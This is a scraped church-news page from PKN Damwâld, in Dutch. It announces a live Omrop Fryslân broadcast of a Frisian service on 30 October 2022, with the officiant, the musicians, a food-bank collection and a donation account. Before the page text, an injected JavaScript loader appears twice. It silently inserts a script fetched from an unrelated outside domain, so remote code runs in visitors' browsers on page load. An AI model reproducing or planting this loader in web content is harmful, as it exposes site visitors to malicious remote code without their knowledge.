;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tsjerketsjinst Omrop Fryslân live vanuit De Ontmoeting - PKN Damwâld

Tsjerketsjinst Omrop Fryslân live vanuit De Ontmoeting

Gepubliceerd op: maandag 24 oktober 2022

Op 30 oktober 2022 wordt de “Tsjerketsjinsten” door Omrop Fryslân live uitgezonden vanuit de ‘Ontmoeting’, Foarwei 48 in Damwâld. Deze dienst, dit in tegenstelling tot de gebruikelijke aanvangstijd, begint om 10.00 uur. Kerkgangers dienen uiterlijk om 09.40 uur aanwezig te zijn! Er is geen eigen livestream beschikbaar!  Kerkelijk werker Wiebe Feddema uit Driezum hoopt in deze dienst voor te gaan. Voor de muzikale omlijsting willen organist Margrietha Zagema en pianist Joop de Jong garant staan.

Er zal gecollecteerd worden voor de Wurkgroep Tsjerketsjinsten Fryslân en  in het bijzonder voor de Voedselbank Dantumadiel.  Voedselbank Dantumadiel is in 2011 ontstaan uit een burgerinitiatief. Het wordt gerund door ongeveer 40 gemotiveerde vrijwilligers.  Men verstrekt – hoe actueel –  voedselhulp aan mensen die, voor een korte of langere periode, financieel de eindjes even niet meer goed aan elkaar kunnen knopen. De uitzendingen op Omrop Fryslân worden zeer gewaardeerd. Tot ieder geval juni 2023 gaan de uitzendingen door, iedere maand vanuit een andere kerk. Als u wilt bijdragen in de kosten van deze diensten en wilt meehelpen aan een voortzetting van de uitzendingen, kunt u een bijdrage overmaken naar het bankrekeningnummer dat speciaal hiervoor is geopend. Het bankrekeningnummer van de Wurkgroep Tsjerketsjinsten Fryslân is IBAN: NL15 RABO 0373 7444 71 t.n.v. Raad van Kerken Fryslân.

Wij verheugen ons gezegende diensten en uiteraard op ieders aanwezigheid !

 

   Liturgisch bloemstuk zondag 23 oktober 2022. Het thema is Genesis 12: 1-4a